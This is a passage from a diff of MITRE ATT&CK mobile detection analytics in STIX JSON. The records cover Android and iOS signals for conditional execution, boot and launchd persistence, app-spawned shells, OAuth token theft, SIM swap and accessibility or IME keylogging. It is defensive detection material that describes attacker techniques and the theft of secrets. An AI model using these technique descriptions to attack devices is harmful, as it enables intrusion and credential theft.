+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate apps expected to evaluate environment attributes before conditional feature activation"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether guarded execution is only suspicious when activated from background or without recent user interaction"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound traffic volume used to distinguish meaningful guarded execution from benign telemetry"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-13 18:45:30.914000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--28304317-cbde-45cd-bf0b-99b5cd8d1478",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0653#AN1738",
+                            "external_id": "AN1738"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1738",
+                    "description": "Detects conditional execution by correlating (1) application access to constrained environment signals such as location, locale, network context, device state, or user interaction timing, (2) prolonged inactivity or feature suppression despite available permissions, and (3) abrupt initiation of higher-risk behavior only when the expected target context is present. Because direct observation of some runtime decision logic is weaker on iOS, the defender relies more heavily on lifecycle, sensor, and downstream network effects following target-condition alignment.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application remains inactive across normal execution windows and transitions into background or foreground activity burst only when qualifying device context, lock state, locale, or network condition exists"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "application has approved capabilities required for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between context checks and guarded execution"
+                        },
+                        {
+                            "field": "TargetContextSet",
+                            "description": "Expected environment properties used for gating, such as location region, locale, SSID/network context, device lock state, or user activity timing"
+                        },
+                        {
+                            "field": "DormancyThreshold",
+                            "description": "Duration of inactivity before guarded behavior begins"
+                        },
+                        {
+                            "field": "ExpectedBackgroundModes",
+                            "description": "Baseline of legitimate apps whose feature activation is context-dependent in background execution"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Expected destinations for apps whose network activity legitimately begins only in certain contexts"
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Acceptable recency of user interaction before guarded execution is considered suspicious"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-13 18:49:55.440000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e8bfbaf2-cfa8-41fd-a5ee-48b57026ac7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0654#AN1739",
+                            "external_id": "AN1739"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1739",
+                    "description": "Correlates anomalous modifications to boot-time or logon-time initialization artifacts (for example, init.rc, vendor init scripts, app_process or shell hijacks, and malicious BOOT_COMPLETED BroadcastReceivers) with subsequent unauthorized script execution after boot. From the defender\u2019s perspective this appears as integrity or attestation failures on the system partition, unexpected writes to protected init paths, new apps registering for boot events, and privileged processes invoking scripts or binaries from non-standard locations shortly after the device boots.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "AndroidAttestation:VerifiedBoot",
+                            "channel": "Verified Boot or dm-verity reports partition hash mismatch, non-green boot state, or integrity failure"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "AndroidLogs:FileSystem",
+                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+                            "name": "AndroidLogs:Framework",
+                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "AndroidAttestation:SafetyNet",
+                            "channel": "SafetyNet attestation with CTSProfileMatch=false or BasicIntegrity=false"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "OEMAttestation:Knox",
+                            "channel": "Samsung Knox attestation shows attestation_state=COMPROMISED or warranty bit set"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between boot/attestation event and suspicious script execution (for example, 0\u201310 minutes after BOOT_COMPLETED)."
+                        },
+                        {
+                            "field": "AuthorizedBootReceivers",
+                            "description": "Enterprise-specific allow list of packages expected to register BOOT_COMPLETED receivers."
+                        },
+                        {
+                            "field": "ProtectedPaths",
+                            "description": "OEM- and ROM-specific list of system and vendor init script locations that should be immutable in production devices."
+                        },
+                        {
+                            "field": "ExpectedAttestationState",
+                            "description": "Expected Verified Boot, SafetyNet, and OEM attestation states for enrolled devices. Custom ROM or dev devices may need relaxed thresholds."
+                        },
+                        {
+                            "field": "IntegrityFailureThreshold",
+                            "description": "Number or rate of attestation failures before escalating to a high-severity incident."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2025-12-02 15:38:03.766000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--007a370c-be77-49c9-9ca3-25d50de35864",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0654#AN1740",
+                            "external_id": "AN1740"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1740",
+                    "description": "Correlates unauthorized alterations to launchd configuration (LaunchDaemons/LaunchAgents plists), background execution entitlements, or sideloaded app containers with suspicious auto-start behavior during device boot or user unlock. From the defender\u2019s view this shows up as new or modified plist files in launchd directories, launchd starting binaries from non-Apple or non-AppStore locations, and apps with unexpected background modes that remain active immediately after boot/unlock.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "iOS:unifiedlog",
+                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application gaining or using unexpected background execution entitlements or modes"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "JailbreakIndicators",
+                            "description": "List of filesystem paths or process names that identify intentionally jailbroken lab devices and should be handled differently."
+                        },
+                        {
+                            "field": "LaunchdWhitelist",
+                            "description": "Organization-specific list of allowed launchd job labels and binary paths."
+                        },
+                        {
+                            "field": "AllowedBackgroundModes",
+                            "description": "Per-app allow list for background execution modes (for example, VOIP, location) to reduce noise."
+                        },
+                        {
+                            "field": "BootUnlockWindow",
+                            "description": "Time window after boot or unlock within which unexpected launchd auto-starts are considered high risk."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2025-12-04 17:05:14.687000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a4242809-30bc-4c00-b247-b6cc11644a07",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0655#AN1741",
+                            "external_id": "AN1741"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1741",
+                    "description": "The defender correlates app-driven shell or command execution setup with subsequent process creation, command invocation, or script-driven follow-on behavior under the same app context, especially when command execution occurs from background state, without recent user interaction, or immediately after payload retrieval or local staging. The analytic prioritizes Android-observable control-plane effects: Java Runtime or similar command-execution method use, shell or sh-like process creation, command parameter visibility where available, and immediate file or network effects produced by the interpreter.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between command-launch method use, process creation, and follow-on file or network effects"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to run shell-like or administrative commands, such as enterprise support tools, terminal apps, approved EMM agents, or developer tooling"
+                        },
+                        {
+                            "field": "AllowedProcessPatterns",
+                            "description": "Expected command interpreters, process names, or parent-child execution chains for approved apps"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether command execution should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "CommandArgumentRiskPatterns",
+                            "description": "Environment-specific list of suspicious command arguments, redirection usage, chaining operators, or shell-control syntax"
+                        },
+                        {
+                            "field": "PostExecutionWriteThreshold",
+                            "description": "Minimum number or size of file artifacts created after interpreter execution to increase confidence"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after command execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-09 20:26:15.372000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--77c81bf1-beef-429a-a426-a716b489383a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0655#AN1742",
+                            "external_id": "AN1742"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1742",
+                    "description": "The defender correlates managed-app runtime behavior indicative of command or shell invocation with subsequent spawned process or shell-like execution effects, then raises confidence when the resulting activity produces local artifacts or network communication outside expected user context. Because direct shell-process visibility can be weaker on iOS in many enterprise deployments, the analytic anchors first on process-creation or lower-level OS API effects where mobile telemetry can observe them, then on lifecycle context and post-execution network or file behavior. Confidence is strongest when the same app shows command invocation followed by process execution and immediate follow-on effects.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between command-execution indication, process effects, and follow-on file or network behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks"
+                        },
+                        {
+                            "field": "AllowedProcessPatterns",
+                            "description": "Expected process-launch or helper-execution patterns for approved managed apps"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether command-execution behavior should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "ArtifactPathPatterns",
+                            "description": "Expected temporary or output file locations for approved app behavior"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after command execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-09 20:37:17.277000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9253e546-bc55-42c1-bf8c-b4337a1ea5b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0656#AN1743",
+                            "external_id": "AN1743"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1743",
+                    "description": "Defender observes an OAuth/OIDC redirect (ACTION_VIEW) resolved to a non-allowlisted handler package (logcat:IntentResolver), followed within a short window by that same package accessing token material via AccountManager/Keystore or reading application token caches under /data/data/<pkg>/(shared_prefs|databases) (logcat:AccountManager, logcat:Keystore, logcat:FileIO). Correlate on package/UID/profile and time proximity to indicate token acquisition.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "android:logcat",
+                            "channel": "KeyChain/AndroidKeyStore read of token alias"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max seconds between redirect handling and token access (e.g., 30\u2013180)."
+                        },
+                        {
+                            "field": "RedirectUriAllowlist",
+                            "description": "Approved redirect URI patterns per app (HTTPS/app-scheme)."
+                        },
+                        {
+                            "field": "TrustedHandlerPackages",
+                            "description": "Expected package names allowed to handle the redirect."
+                        },
+                        {
+                            "field": "TokenFileRegex",
+                            "description": "Environment-specific token cache filenames/paths."
+                        },
+                        {
+                            "field": "WorkProfileScope",
+                            "description": "Restrict to enterprise work profile to reduce personal-app noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-02-02 17:41:17.052000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--085c9205-d55a-4e33-a5df-241e505be32f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0658#AN1747",
+                            "external_id": "AN1747"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1747",
+                    "description": "A defender correlates a sudden carrier identity/service state change (SIM/line identifier change or unexpected loss of cellular service) with near-term device messaging/telephony disruption and a concurrent shift in authentication traffic patterns\u2014such as a spike in SMS-based verification flows or account recovery activity from the same user\u2019s identities\u2014indicating the user\u2019s number may have been transferred to a different SIM/device (SIM swap impact).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Device inventory changes involving phone number/line identifier fields (when available), eSIM profile presence, or compliance signal indicating SIM profile change"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ServiceLossDurationThreshold",
+                            "description": "Minimum duration of unexpected cellular service loss before considering it suspicious (reduces noise from transient coverage issues)."
+                        },
+                        {
+                            "field": "SimStateChangeTypes",
+                            "description": "Which SIM-related state changes to alert on (SIM removed, SIM refresh, operator changed, eSIM profile changed)."
+                        },
+                        {
+                            "field": "SwapCorrelationWindow",
+                            "description": "Time window to correlate SIM/service state change with downstream identity traffic anomalies (e.g., 30m\u20136h)."
+                        },
+                        {
+                            "field": "IdentityEndpointAllowList",
+                            "description": "Baseline of expected IdP/banking/crypto identity endpoints for the org; used to reduce false positives."
+                        },
+                        {
+                            "field": "AuthTrafficSpikeThreshold",
+                            "description": "Threshold for increase in OTP/MFA/account recovery traffic volume relative to user baseline."
+                        },
+                        {
+                            "field": "UserTravelContext",
+                            "description": "Optional enrichment\u2014treat carrier changes as lower risk during known travel/roaming windows."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-03-06 15:07:15.622000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4ce71d01-ba3b-4ed2-a615-766daa0ff144",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0658#AN1748",
+                            "external_id": "AN1748"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1748",
+                    "description": "A defender correlates an unexpected change in cellular subscription state (eSIM/SIM profile change, carrier/operator change, or sudden persistent loss of cellular service) with near-term disruption signals and a rapid increase in authentication-related network activity consistent with SMS verification or account recovery flows, suggesting the user\u2019s number has been ported to an adversary-controlled SIM/device (SIM swap impact).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Cellular service state transitions (in-service\u2192no-service), SIM state change, carrier/operator identifier change, or baseband/telephony stack state change observed by agent telemetry"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed device inventory change indicating cellular plan/eSIM profile updates (where available via supervised iOS + MDM reporting)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "SupervisedInventoryAvailability",
+                            "description": "Tuning based on whether supervised iOS + MDM provides sufficient subscription/eSIM visibility; otherwise rely on agent + network signals."
+                        },
+                        {
+                            "field": "ServiceLossDurationThreshold",
+                            "description": "Minimum persistent no-service duration required to reduce false positives from normal carrier fluctuations."
+                        },
+                        {
+                            "field": "SwapCorrelationWindow",
+                            "description": "Time window to link subscription disruption with identity/auth network anomalies."
+                        },
+                        {
+                            "field": "AuthTrafficSpikeThreshold",
+                            "description": "Threshold for suspicious increase in OTP/MFA/account recovery traffic relative to device/user baseline."
+                        },
+                        {
+                            "field": "RoamingExpectedRegions",
+                            "description": "Tuning to reduce false positives when the user is traveling or roaming across carrier networks."
+                        },
+                        {
+                            "field": "IdentityEndpointAllowList",
+                            "description": "Baseline list of expected identity endpoints (IdP, banking, crypto) for the device/user population"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-06 18:43:26.902000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--8c29fa0f-6b35-40c2-9c99-081a0997db86",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0661#AN1751",
+                            "external_id": "AN1751"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1751",
+                    "description": "Defender correlates an app acquiring input-capture capability (AccessibilityService enablement or default IME set) with high-frequency text-change/IME commit callbacks sourced from other packages, followed by local keylog persistence and/or small, immediate network egress. Chain: capability/permission \u2192 intercept (accessibility \u2018TYPE_VIEW_TEXT_CHANGED\u2019 or IME commitText/onStartInput bursts) \u2192 persist to container \u2192 near-term egress.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
